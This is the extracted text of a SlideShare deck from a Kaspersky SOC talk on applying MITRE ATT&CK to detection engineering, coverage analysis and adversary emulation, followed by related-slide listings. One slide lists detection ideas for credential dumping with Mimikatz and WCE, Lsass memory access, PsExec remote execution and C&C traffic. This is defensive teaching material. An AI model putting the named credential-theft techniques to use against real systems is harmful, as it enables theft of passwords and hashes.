SlideShare a Scribd company logo
1 of 39
Download to read offline
Teymur Kheirkhabarov
Head of SOC R&D
Sergey Soldatov
Head of SOC
How MITRE ATT&CK helps security operations
Who is Sergey ?
Since 2016: Head of SOC at Kaspersky lab
Internal SOC
Commercial MDR* services
2012 – 2016: Chief manager at RN-Inform
Rosneft security services insourcing
2002 – 2012: TNK-BP Group
IT security integration into business and IT operations
Security controls in IT projects
Security operations
2001-2002: Software developer at RIPN
BMSTU graduate
CISA, CISSP
* Managed Detection and Response
Who is Teymur ?
2016 – : Head of SOC R&D at
Kaspersky lab
Development: sensors, sensor data, event
processing, detection logic, SOC
infrastructure
SOC R&D team coordination and
management
2011 – 2016: Head of Information
security
IT security integration into business and IT
operations
Security controls in IT projects
Security operations
Krasnoyarsk SibSAU graduate
Detect layers: David Bianco's pyramid of pain
http://detect-respond.blogspot.ru/2013/03/the-pyramid-of-pain.html
Commodity
Prevention/Detection
tools capabilities
(can be done
automatically)
Human Analyst required
IoC
AM-signature,YaraTTP*-based
detect
* TTP – tactics techniques and procedures
Different approaches to detection
5
Attacker activity IoC-based detection Tool-based detection TTP-based detection
Use Mimikatz for
dumping
authentication data
(password/hashes)
from memory
Search for hashes
(MD5/SHA1/SHA256)
of utilities that dump
credentials
Search for files with specific
extensions. For example,
Mimikatz export Kerberos tickets
to .kirbi files, and WCE creates
wceaux.dll
Search for processes, that access
Lsass memory
Use of unsigned DLLs, loaded into
Lsass process
Use PsExec for
remote
administration
Search for hashes
(MD5/SHA1/SHA256)
of utilities for remote
administration
Search for installations of
services, typical for remote
administration utilities. For
example, psexec installs service
PSEXECSVC
Search for remote installation of
new service, and then that service
starts process
C&C communication Search for known C&C
(IP/FQDN/URL)
Search for User-Agents, typical
for particular utilities/malware
Search for use of particular DGA,
typical for specific
utilities/malware
Search for periodic network
communication
Search for communication with
randomly generated domain names
Search for communication with
domains, registered not long ago
Tactics, Techniques and Procedures
6
Tactic - the way the threat actor operates during different
steps of its operation/campaign. Tactics represent the “why” of
an ATT&CK technique. It is the adversary’s tactical objective: the
reason for performing an action.
Technique – the approach the threat actor uses to facilitate
Tactic. Technique represent “how” an adversary achieves a tactical
objective by performing an action. For example, and adversary may
dump credentials to achieve credential access
Procedure - the exact ways a particular adversary or piece
of software implements a technique. These are described by the
examples sections in ATT&CK techniques
Tactic
(Why?)
Technique
(How?)
Procedure
(Particular
implementation)
ATT&CK – Adversarial Tactics Techniques and Common Knowledge
7
https://attack.mitre.org/matrices/enterprise/
Tactics
Techniques
Technique
8
https://attack.mitre.org/techniques/T1060/
The importance of Procedure
9
For each Technique many Procedures can be introduced
There are Procedures that can’t be detected due to
technological limitations
Not all procedures are yet known
What do we detect? Procedure!
Where do Procedures can taken? ATT&CK technique description!
Good talks in the Internet
https://offzone.moscow/speakers
/teymur-heirhabarov/
https://2017.zeronights.ru/report/hunting-for-credentials-
dumping-in-windows-environment/
https://www.slideshare.net/heirhabarov/
kheirkhabarov24052017phdays7
Examples of Techniques and corresponding Procedures
T1086: PowerShell
13
Examples of Techniques and corresponding Procedures
T1086: PowerShell
14
~ 45 000 PC, last 30 days period
Examples of Techniques and corresponding Procedures
T1086: PowerShell. PowerShell in autorun
15
Examples of Techniques and corresponding Procedures
T1086: PowerShell. PowerShell in autorun
16
Examples of Techniques and corresponding Procedures
T1086: PowerShell. PowerShell suspicious command lines
17
Before adaptation
After adaptation
Examples of Techniques and corresponding Procedures
T1086: PowerShell. PowerShell download cradles
18 https://gist.github.com/HarmJ0y/bb48307ffa663256e239#file-downloadcradles-ps1
Examples of Techniques and corresponding Procedures
T1086: PowerShell. PowerShell download cradles
19
Examples of Techniques and corresponding Procedures
T1086: PowerShell. PowerShell obfuscation
20
https://github.com/danielbohannon/Invoke-Obfuscation
Examples of Techniques and corresponding Procedures
T1086: PowerShell. PowerShell obfuscation
21
Examples of Techniques and corresponding Procedures
T1086: PowerShell. PowerShell Base64 encoding
22
Examples of Techniques and corresponding Procedures
T1084: Windows Management Instrumentation Event Subscription
23
Examples of Techniques and corresponding Procedures
T1084: Windows Management Instrumentation Event Subscription
Enumeration of installed ActiveScript consumers
Before adaptation After adaptation
~ 146 000 PC, 1 year period
Enumeration of installed CommandLine consumers
Before adaptation After adaptation
Examples of Techniques and corresponding Procedures
T1084: Windows Management Instrumentation Event Subscription
25
Malicious CommandLine event consumer
Examples of Techniques and corresponding Procedures
T1084: Windows Management Instrumentation Event Subscription
26
Malicious ActiveScript event consumer
Use case #1: Detects development
27
ATT&CK – one of the good sources of
detect ideas
Attack
emulation
Analysis of
detection
capabilities
Required
processing
Required
telemetry
Detect development,
testing, publication
Endless testing in
operations
Metrics
Other sources of detect ideas – TI from operations
28
Public
Twitter, blogs, talks, etc.
Tests*
Private
Internal threat research
Operations practice
Threat hunting**
DFIRMA***
Security Assessment/Red teaming
* https://attackevals.mitre.org/evaluations.html , for example
** the practice of searching iteratively through data to detect [advanced] threats that evade automatic security solutions
*** Digital forensics, Incident response, Malware analysis
Use case #1’: Detects development priorities (post-breach)
30
Tactics priorities:
Persistence
Privilege escalation
Defense evasion
Credential access
Lateral movement
Execution
…
Techniques priorities
Available telemetry
Used by which APT actors and how they relevant to you?
Required investments (~ risk assessment)
Use case #2: Detects classification
31
Detects management
Understand current coverage
• What do we have for each technique*?
• Gap analysis
Extend coverage
• Add new detects?
• Update existing?
Simplifies R&D team work
* Through appropriate Procedure
Detects (“Hunts”) mapped to MITRE techniques
Use case #3: SOC Analyst’s body of knowledge
33
Attack kill chain (tactics)
Known so far attack techniques descriptions
Public reports about actual APT campaign linked to
used techniques
Recommendations on detection and mitigation
In addition:
• OS architecture
• Known attacker’s toolset
• Not hypothetical attacks, but taken
from practice*
* https://reply-to-all.blogspot.com/2013/01/blog-post.html
Use case #4: detect rate assessment by ATT&CK coverage
34
Choose scenario (sequence of particular
procedures)*
Execute in lab and see detects
Evaluate based on detection types**:
Telemetry
Enrichment
Behavior detect
Now results can be compared***
Can the techniques be considered covered
based on the test – the question is open –
depends on actual procedures, used in test
* https://attackevals.mitre.org/
** https://attackevals.mitre.org/methodology/detection-categorization.html
*** https://reply-to-all.blogspot.com/2018/12/mitre-edr.html
MITRE ATT&CK Evaluations
Particular Procedures:
APT3: 56 Enterprise techniques across 10 tactics
“Living off the land”*
Focus on “Primary” techniques**, on behavior and not tools and IoCs
2 Scenarios: 10-step with Cobalt Strike + 10 step Empire***
Same lab environment for all vendors
Detection categorization
Main detection types:
• None
• Telemery
• Indicator of Compromise
• Enrichment
• General behavior
• Specific behavior
* https://www.youtube.com/watch?v=j-r6UonEkUw
** Differentiate “Primary” and “Enabling” techniques. “Enabling” - many of the techniques required Command-Line Interface, Execution through API, and
PowerShell. In assessment MITRE focused on the Primary technique that was performed, rather than the mechanism of execution (which was considered the
Enabling technique)
*** https://www.cobaltstrike.com/ ; https://github.com/EmpireProject/Empire
Modifiers:
• Delayed
• Tained
• Configuration
change
BAS: Breach and Attack Simulation
METTA
https://github.com/uber-common/metta
Caldera
https://github.com/mitre/caldera
Unfetter
https://mitre.github.io/unfetter/
Endgame
https://github.com/endgameinc/RTA
Red Canary - Atomic read team
https://github.com/redcanaryco/atomic-red-team
Microsoft
https://blogs.technet.microsoft.com/motiba/2018/04/09/invoke-adversary-simulating-adversary-operations/
KaLaBAS?
Existing – vendor specific
Not enough tests
Need to integrate to existing auto-
testing infrastructure
Use case #5: Adversary emulation, red teaming
38
Common framework for Red teams, Blue teams and Purple teams collaboration
Create adversary emulation scenarios: choose relevant TTP
Create red team plan: choose TTPs that might be missed by existing Blue team
Gap analysis of current defensive technologies – prioritize future investments
SOC operational efficiency (maturity) assessment
!!DEMO!!
Let’s talk?

More Related Content

What's hot

MITRE ATT&CKcon 2.0: Using Threat Intelligence to Focus ATT&CK Activities; Da...
MITRE ATT&CKcon 2.0: Using Threat Intelligence to Focus ATT&CK Activities; Da...MITRE ATT&CKcon 2.0: Using Threat Intelligence to Focus ATT&CK Activities; Da...
MITRE ATT&CKcon 2.0: Using Threat Intelligence to Focus ATT&CK Activities; Da...MITRE - ATT&CKcon
 
Purple Teaming with ATT&CK - x33fcon 2018
Purple Teaming with ATT&CK - x33fcon 2018Purple Teaming with ATT&CK - x33fcon 2018
Purple Teaming with ATT&CK - x33fcon 2018Christopher Korban
 
Adversary Emulation using CALDERA
Adversary Emulation using CALDERAAdversary Emulation using CALDERA
Adversary Emulation using CALDERAErik Van Buggenhout
 
Effective Threat Hunting with Tactical Threat Intelligence
Effective Threat Hunting with Tactical Threat IntelligenceEffective Threat Hunting with Tactical Threat Intelligence
Effective Threat Hunting with Tactical Threat IntelligenceDhruv Majumdar
 
Adversary Emulation using CALDERA
Adversary Emulation using CALDERAAdversary Emulation using CALDERA
Adversary Emulation using CALDERAErik Van Buggenhout
 
Addressing the cyber kill chain
Addressing the cyber kill chainAddressing the cyber kill chain
Addressing the cyber kill chainSymantec Brasil
 
Threat-Based Adversary Emulation with MITRE ATT&CK
Threat-Based Adversary Emulation with MITRE ATT&CKThreat-Based Adversary Emulation with MITRE ATT&CK
Threat-Based Adversary Emulation with MITRE ATT&CKKatie Nickels
 
Putting MITRE ATT&CK into Action with What You Have, Where You Are
Putting MITRE ATT&CK into Action with What You Have, Where You ArePutting MITRE ATT&CK into Action with What You Have, Where You Are
Putting MITRE ATT&CK into Action with What You Have, Where You AreKatie Nickels
 
Adversary Emulation and Red Team Exercises - EDUCAUSE
Adversary Emulation and Red Team Exercises - EDUCAUSEAdversary Emulation and Red Team Exercises - EDUCAUSE
Adversary Emulation and Red Team Exercises - EDUCAUSEJorge Orchilles
 
Mapping ATT&CK Techniques to ENGAGE Activities
Mapping ATT&CK Techniques to ENGAGE ActivitiesMapping ATT&CK Techniques to ENGAGE Activities
Mapping ATT&CK Techniques to ENGAGE ActivitiesMITRE ATT&CK
 
Sharpening your Threat-Hunting Program with ATTACK Framework
Sharpening your Threat-Hunting Program with ATTACK FrameworkSharpening your Threat-Hunting Program with ATTACK Framework
Sharpening your Threat-Hunting Program with ATTACK FrameworkMITRE - ATT&CKcon
 
Threat hunting 101 by Sandeep Singh
Threat hunting 101 by Sandeep SinghThreat hunting 101 by Sandeep Singh
Threat hunting 101 by Sandeep SinghOWASP Delhi
 
No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016Matthew Dunwoody
 
Cyber Threat hunting workshop
Cyber Threat hunting workshopCyber Threat hunting workshop
Cyber Threat hunting workshopArpan Raval
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operationsSunny Neo
 
ATTACKers Think in Graphs: Building Graphs for Threat Intelligence
ATTACKers Think in Graphs: Building Graphs for Threat IntelligenceATTACKers Think in Graphs: Building Graphs for Threat Intelligence
ATTACKers Think in Graphs: Building Graphs for Threat IntelligenceMITRE - ATT&CKcon
 
Threat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-onThreat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-onSplunk
 
MITRE ATT&CKcon 2.0: State of the ATT&CK; Blake Strom, MITRE
MITRE ATT&CKcon 2.0: State of the ATT&CK; Blake Strom, MITREMITRE ATT&CKcon 2.0: State of the ATT&CK; Blake Strom, MITRE
MITRE ATT&CKcon 2.0: State of the ATT&CK; Blake Strom, MITREMITRE - ATT&CKcon
 
ATT&CK Updates- ATT&CK for ICS
ATT&CK Updates- ATT&CK for ICSATT&CK Updates- ATT&CK for ICS
ATT&CK Updates- ATT&CK for ICSMITRE ATT&CK
 
Security Operations, MITRE ATT&CK, SOC Roles / Competencies
Security Operations, MITRE ATT&CK, SOC Roles / Competencies Security Operations, MITRE ATT&CK, SOC Roles / Competencies
Security Operations, MITRE ATT&CK, SOC Roles / Competencies Harry McLaren
 

What's hot (20)

MITRE ATT&CKcon 2.0: Using Threat Intelligence to Focus ATT&CK Activities; Da...
MITRE ATT&CKcon 2.0: Using Threat Intelligence to Focus ATT&CK Activities; Da...MITRE ATT&CKcon 2.0: Using Threat Intelligence to Focus ATT&CK Activities; Da...
MITRE ATT&CKcon 2.0: Using Threat Intelligence to Focus ATT&CK Activities; Da...
 
Purple Teaming with ATT&CK - x33fcon 2018
Purple Teaming with ATT&CK - x33fcon 2018Purple Teaming with ATT&CK - x33fcon 2018
Purple Teaming with ATT&CK - x33fcon 2018
 
Adversary Emulation using CALDERA
Adversary Emulation using CALDERAAdversary Emulation using CALDERA
Adversary Emulation using CALDERA
 
Effective Threat Hunting with Tactical Threat Intelligence
Effective Threat Hunting with Tactical Threat IntelligenceEffective Threat Hunting with Tactical Threat Intelligence
Effective Threat Hunting with Tactical Threat Intelligence
 
Adversary Emulation using CALDERA
Adversary Emulation using CALDERAAdversary Emulation using CALDERA
Adversary Emulation using CALDERA
 
Addressing the cyber kill chain
Addressing the cyber kill chainAddressing the cyber kill chain
Addressing the cyber kill chain
 
Threat-Based Adversary Emulation with MITRE ATT&CK
Threat-Based Adversary Emulation with MITRE ATT&CKThreat-Based Adversary Emulation with MITRE ATT&CK
Threat-Based Adversary Emulation with MITRE ATT&CK
 
Putting MITRE ATT&CK into Action with What You Have, Where You Are
Putting MITRE ATT&CK into Action with What You Have, Where You ArePutting MITRE ATT&CK into Action with What You Have, Where You Are
Putting MITRE ATT&CK into Action with What You Have, Where You Are
 
Adversary Emulation and Red Team Exercises - EDUCAUSE
Adversary Emulation and Red Team Exercises - EDUCAUSEAdversary Emulation and Red Team Exercises - EDUCAUSE
Adversary Emulation and Red Team Exercises - EDUCAUSE
 
Mapping ATT&CK Techniques to ENGAGE Activities
Mapping ATT&CK Techniques to ENGAGE ActivitiesMapping ATT&CK Techniques to ENGAGE Activities
Mapping ATT&CK Techniques to ENGAGE Activities
 
Sharpening your Threat-Hunting Program with ATTACK Framework
Sharpening your Threat-Hunting Program with ATTACK FrameworkSharpening your Threat-Hunting Program with ATTACK Framework
Sharpening your Threat-Hunting Program with ATTACK Framework
 
Threat hunting 101 by Sandeep Singh
Threat hunting 101 by Sandeep SinghThreat hunting 101 by Sandeep Singh
Threat hunting 101 by Sandeep Singh
 
No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016
 
Cyber Threat hunting workshop
Cyber Threat hunting workshopCyber Threat hunting workshop
Cyber Threat hunting workshop
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operations
 
ATTACKers Think in Graphs: Building Graphs for Threat Intelligence
ATTACKers Think in Graphs: Building Graphs for Threat IntelligenceATTACKers Think in Graphs: Building Graphs for Threat Intelligence
ATTACKers Think in Graphs: Building Graphs for Threat Intelligence
 
Threat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-onThreat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-on
 
MITRE ATT&CKcon 2.0: State of the ATT&CK; Blake Strom, MITRE
MITRE ATT&CKcon 2.0: State of the ATT&CK; Blake Strom, MITREMITRE ATT&CKcon 2.0: State of the ATT&CK; Blake Strom, MITRE
MITRE ATT&CKcon 2.0: State of the ATT&CK; Blake Strom, MITRE
 
ATT&CK Updates- ATT&CK for ICS
ATT&CK Updates- ATT&CK for ICSATT&CK Updates- ATT&CK for ICS
ATT&CK Updates- ATT&CK for ICS
 
Security Operations, MITRE ATT&CK, SOC Roles / Competencies
Security Operations, MITRE ATT&CK, SOC Roles / Competencies Security Operations, MITRE ATT&CK, SOC Roles / Competencies
Security Operations, MITRE ATT&CK, SOC Roles / Competencies
 

Similar to How MITRE ATT&CK helps security operations

RED-TEAM_Conclave
RED-TEAM_ConclaveRED-TEAM_Conclave
RED-TEAM_ConclaveNSConclave
 
idsecconf2023 - Mangatas Tondang, Wahyu Nuryanto - Penerapan Model Detection ...
idsecconf2023 - Mangatas Tondang, Wahyu Nuryanto - Penerapan Model Detection ...idsecconf2023 - Mangatas Tondang, Wahyu Nuryanto - Penerapan Model Detection ...
idsecconf2023 - Mangatas Tondang, Wahyu Nuryanto - Penerapan Model Detection ...idsecconf
 
Presentazione tesi magistrale procentese.pptx
Presentazione tesi magistrale procentese.pptxPresentazione tesi magistrale procentese.pptx
Presentazione tesi magistrale procentese.pptxAntonioProcentese1
 
Software security engineering
Software security engineeringSoftware security engineering
Software security engineeringAHM Pervej Kabir
 
Software security engineering
Software security engineeringSoftware security engineering
Software security engineeringAHM Pervej Kabir
 
AUTOMATED PENETRATION TESTING: AN OVERVIEW
AUTOMATED PENETRATION TESTING: AN OVERVIEWAUTOMATED PENETRATION TESTING: AN OVERVIEW
AUTOMATED PENETRATION TESTING: AN OVERVIEWcscpconf
 
Application Security in an Agile World - Agile Singapore 2016
Application Security in an Agile World - Agile Singapore 2016Application Security in an Agile World - Agile Singapore 2016
Application Security in an Agile World - Agile Singapore 2016Stefan Streichsbier
 
PPT-Security-for-Management.pptx
PPT-Security-for-Management.pptxPPT-Security-for-Management.pptx
PPT-Security-for-Management.pptxRSAArcher
 
Zero-bug Software, Mathematically Guaranteed
Zero-bug Software, Mathematically GuaranteedZero-bug Software, Mathematically Guaranteed
Zero-bug Software, Mathematically GuaranteedAshley Zupkus
 
Cyber security applied to embedded systems
Cyber security applied to embedded systemsCyber security applied to embedded systems
Cyber security applied to embedded systemsTonex
 
[Warsaw 26.06.2018] SDL Threat Modeling principles
[Warsaw 26.06.2018] SDL Threat Modeling principles[Warsaw 26.06.2018] SDL Threat Modeling principles
[Warsaw 26.06.2018] SDL Threat Modeling principlesOWASP
 
GSA calls out Cyber Hunt skills in final Cybersecurity Contract Orals
GSA calls out Cyber Hunt skills in final Cybersecurity Contract OralsGSA calls out Cyber Hunt skills in final Cybersecurity Contract Orals
GSA calls out Cyber Hunt skills in final Cybersecurity Contract OralsDavid Sweigert
 
Web Application Security Testing
Web Application Security TestingWeb Application Security Testing
Web Application Security TestingMarco Morana
 
Ethical Hacking Conference 2015- Building Secure Products -a perspective
 Ethical Hacking Conference 2015- Building Secure Products -a perspective Ethical Hacking Conference 2015- Building Secure Products -a perspective
Ethical Hacking Conference 2015- Building Secure Products -a perspectiveDr. Anish Cheriyan (PhD)
 
Cybersecurity Test and Evaluation (TE) Training : Tonex Training
Cybersecurity Test and Evaluation (TE) Training : Tonex TrainingCybersecurity Test and Evaluation (TE) Training : Tonex Training
Cybersecurity Test and Evaluation (TE) Training : Tonex TrainingBryan Len
 
Secure Software Development Lifecycle
Secure Software Development LifecycleSecure Software Development Lifecycle
Secure Software Development Lifecycle1&1
 

Similar to How MITRE ATT&CK helps security operations (20)

RED-TEAM_Conclave
RED-TEAM_ConclaveRED-TEAM_Conclave
RED-TEAM_Conclave
 
idsecconf2023 - Mangatas Tondang, Wahyu Nuryanto - Penerapan Model Detection ...
idsecconf2023 - Mangatas Tondang, Wahyu Nuryanto - Penerapan Model Detection ...idsecconf2023 - Mangatas Tondang, Wahyu Nuryanto - Penerapan Model Detection ...
idsecconf2023 - Mangatas Tondang, Wahyu Nuryanto - Penerapan Model Detection ...
 
Ecsa LPT V8 brochure
Ecsa LPT V8 brochureEcsa LPT V8 brochure
Ecsa LPT V8 brochure
 
Presentazione tesi magistrale procentese.pptx
Presentazione tesi magistrale procentese.pptxPresentazione tesi magistrale procentese.pptx
Presentazione tesi magistrale procentese.pptx
 
Software security engineering
Software security engineeringSoftware security engineering
Software security engineering
 
Software security engineering
Software security engineeringSoftware security engineering
Software security engineering
 
AUTOMATED PENETRATION TESTING: AN OVERVIEW
AUTOMATED PENETRATION TESTING: AN OVERVIEWAUTOMATED PENETRATION TESTING: AN OVERVIEW
AUTOMATED PENETRATION TESTING: AN OVERVIEW
 
Application Security in an Agile World - Agile Singapore 2016
Application Security in an Agile World - Agile Singapore 2016Application Security in an Agile World - Agile Singapore 2016
Application Security in an Agile World - Agile Singapore 2016
 
PPT-Security-for-Management.pptx
PPT-Security-for-Management.pptxPPT-Security-for-Management.pptx
PPT-Security-for-Management.pptx
 
Zero-bug Software, Mathematically Guaranteed
Zero-bug Software, Mathematically GuaranteedZero-bug Software, Mathematically Guaranteed
Zero-bug Software, Mathematically Guaranteed
 
Se project-methodology-for-security-project-web
Se project-methodology-for-security-project-webSe project-methodology-for-security-project-web
Se project-methodology-for-security-project-web
 
Cyber security applied to embedded systems
Cyber security applied to embedded systemsCyber security applied to embedded systems
Cyber security applied to embedded systems
 
[Warsaw 26.06.2018] SDL Threat Modeling principles
[Warsaw 26.06.2018] SDL Threat Modeling principles[Warsaw 26.06.2018] SDL Threat Modeling principles
[Warsaw 26.06.2018] SDL Threat Modeling principles
 
GSA calls out Cyber Hunt skills in final Cybersecurity Contract Orals
GSA calls out Cyber Hunt skills in final Cybersecurity Contract OralsGSA calls out Cyber Hunt skills in final Cybersecurity Contract Orals
GSA calls out Cyber Hunt skills in final Cybersecurity Contract Orals
 
Arved sandstrom - the rotwithin - atlseccon2011
Arved sandstrom - the rotwithin - atlseccon2011Arved sandstrom - the rotwithin - atlseccon2011
Arved sandstrom - the rotwithin - atlseccon2011
 
Security testing
Security testingSecurity testing
Security testing
 
Web Application Security Testing
Web Application Security TestingWeb Application Security Testing
Web Application Security Testing
 
Ethical Hacking Conference 2015- Building Secure Products -a perspective
 Ethical Hacking Conference 2015- Building Secure Products -a perspective Ethical Hacking Conference 2015- Building Secure Products -a perspective
Ethical Hacking Conference 2015- Building Secure Products -a perspective
 
Cybersecurity Test and Evaluation (TE) Training : Tonex Training
Cybersecurity Test and Evaluation (TE) Training : Tonex TrainingCybersecurity Test and Evaluation (TE) Training : Tonex Training
Cybersecurity Test and Evaluation (TE) Training : Tonex Training
 
Secure Software Development Lifecycle
Secure Software Development LifecycleSecure Software Development Lifecycle
Secure Software Development Lifecycle
 

More from Sergey Soldatov

Metrics in Security Operations
Metrics in Security OperationsMetrics in Security Operations
Metrics in Security OperationsSergey Soldatov
 
Сколько надо SOC?
Сколько надо SOC?Сколько надо SOC?
Сколько надо SOC?Sergey Soldatov
 
От мониторинга к форенсике и обратно
От мониторинга к форенсике и обратноОт мониторинга к форенсике и обратно
От мониторинга к форенсике и обратноSergey Soldatov
 
Роботы среди нас!
Роботы среди нас!Роботы среди нас!
Роботы среди нас!Sergey Soldatov
 
Практика обнаружения атак, использующих легальные инструменты
Практика обнаружения атак, использующих легальные инструментыПрактика обнаружения атак, использующих легальные инструменты
Практика обнаружения атак, использующих легальные инструментыSergey Soldatov
 
Reducing cyber risks in the era of digital transformation
Reducing cyber risks in the era of digital transformationReducing cyber risks in the era of digital transformation
Reducing cyber risks in the era of digital transformationSergey Soldatov
 
Kaspersky managed protection
Kaspersky managed protectionKaspersky managed protection
Kaspersky managed protectionSergey Soldatov
 
Hunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureSergey Soldatov
 
Трудовые будни охотника на угрозы
Трудовые будни охотника на угрозыТрудовые будни охотника на угрозы
Трудовые будни охотника на угрозыSergey Soldatov
 
Охота на угрозы на BIS summit 2016
Охота на угрозы на BIS summit 2016Охота на угрозы на BIS summit 2016
Охота на угрозы на BIS summit 2016Sergey Soldatov
 
Threat hunting as SOC process
Threat hunting as SOC processThreat hunting as SOC process
Threat hunting as SOC processSergey Soldatov
 
Мониторинг своими руками
Мониторинг своими рукамиМониторинг своими руками
Мониторинг своими рукамиSergey Soldatov
 
модульный под к документир V5
модульный под к документир V5модульный под к документир V5
модульный под к документир V5Sergey Soldatov
 
IDM - это непросто!
IDM - это непросто!IDM - это непросто!
IDM - это непросто!Sergey Soldatov
 
Некриптографическое исследование носителей православной криптографии
Некриптографическое исследование носителей  православной криптографииНекриптографическое исследование носителей  православной криптографии
Некриптографическое исследование носителей православной криптографииSergey Soldatov
 
Opensource vs. Non-opensource
Opensource vs. Non-opensourceOpensource vs. Non-opensource
Opensource vs. Non-opensourceSergey Soldatov
 
Примерные критерии оценки IDM
Примерные критерии оценки IDMПримерные критерии оценки IDM
Примерные критерии оценки IDMSergey Soldatov
 
PHDays '14 Cracking java pseudo random sequences by egorov & soldatov
PHDays '14   Cracking java pseudo random sequences by egorov & soldatovPHDays '14   Cracking java pseudo random sequences by egorov & soldatov
PHDays '14 Cracking java pseudo random sequences by egorov & soldatovSergey Soldatov
 

More from Sergey Soldatov (20)

Metrics in Security Operations
Metrics in Security OperationsMetrics in Security Operations
Metrics in Security Operations
 
Сколько надо SOC?
Сколько надо SOC?Сколько надо SOC?
Сколько надо SOC?
 
От мониторинга к форенсике и обратно
От мониторинга к форенсике и обратноОт мониторинга к форенсике и обратно
От мониторинга к форенсике и обратно
 
Роботы среди нас!
Роботы среди нас!Роботы среди нас!
Роботы среди нас!
 
Практика обнаружения атак, использующих легальные инструменты
Практика обнаружения атак, использующих легальные инструментыПрактика обнаружения атак, использующих легальные инструменты
Практика обнаружения атак, использующих легальные инструменты
 
Reducing cyber risks in the era of digital transformation
Reducing cyber risks in the era of digital transformationReducing cyber risks in the era of digital transformation
Reducing cyber risks in the era of digital transformation
 
Kaspersky managed protection
Kaspersky managed protectionKaspersky managed protection
Kaspersky managed protection
 
Hunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows Infrastructure
 
Трудовые будни охотника на угрозы
Трудовые будни охотника на угрозыТрудовые будни охотника на угрозы
Трудовые будни охотника на угрозы
 
Охота на угрозы на BIS summit 2016
Охота на угрозы на BIS summit 2016Охота на угрозы на BIS summit 2016
Охота на угрозы на BIS summit 2016
 
Threat hunting as SOC process
Threat hunting as SOC processThreat hunting as SOC process
Threat hunting as SOC process
 
A Threat Hunter Himself
A Threat Hunter HimselfA Threat Hunter Himself
A Threat Hunter Himself
 
Мониторинг своими руками
Мониторинг своими рукамиМониторинг своими руками
Мониторинг своими руками
 
Вопросы к DLP
Вопросы к DLPВопросы к DLP
Вопросы к DLP
 
модульный под к документир V5
модульный под к документир V5модульный под к документир V5
модульный под к документир V5
 
IDM - это непросто!
IDM - это непросто!IDM - это непросто!
IDM - это непросто!
 
Некриптографическое исследование носителей православной криптографии
Некриптографическое исследование носителей  православной криптографииНекриптографическое исследование носителей  православной криптографии
Некриптографическое исследование носителей православной криптографии
 
Opensource vs. Non-opensource
Opensource vs. Non-opensourceOpensource vs. Non-opensource
Opensource vs. Non-opensource
 
Примерные критерии оценки IDM
Примерные критерии оценки IDMПримерные критерии оценки IDM
Примерные критерии оценки IDM
 
PHDays '14 Cracking java pseudo random sequences by egorov & soldatov
PHDays '14   Cracking java pseudo random sequences by egorov & soldatovPHDays '14   Cracking java pseudo random sequences by egorov & soldatov
PHDays '14 Cracking java pseudo random sequences by egorov & soldatov
 

Recently uploaded

From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .Alan Dix
 
A Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersA Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersNicole Novielli
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024Lorenzo Miniero
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxLoriGlavin3
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024Lonnie McRorey
 
So einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdfSo einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdfpanagenda
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Manik S Magar
 
Scale your database traffic with Read & Write split using MySQL Router
Scale your database traffic with Read & Write split using MySQL RouterScale your database traffic with Read & Write split using MySQL Router
Scale your database traffic with Read & Write split using MySQL RouterMydbops
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfLoriGlavin3
 
Visualising and forecasting stocks using Dash
Visualising and forecasting stocks using DashVisualising and forecasting stocks using Dash
Visualising and forecasting stocks using Dashnarutouzumaki53779
 
Time Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsTime Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsNathaniel Shimoni
 
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESSALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESmohitsingh558521
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLScyllaDB
 
Generative AI for Technical Writer or Information Developers
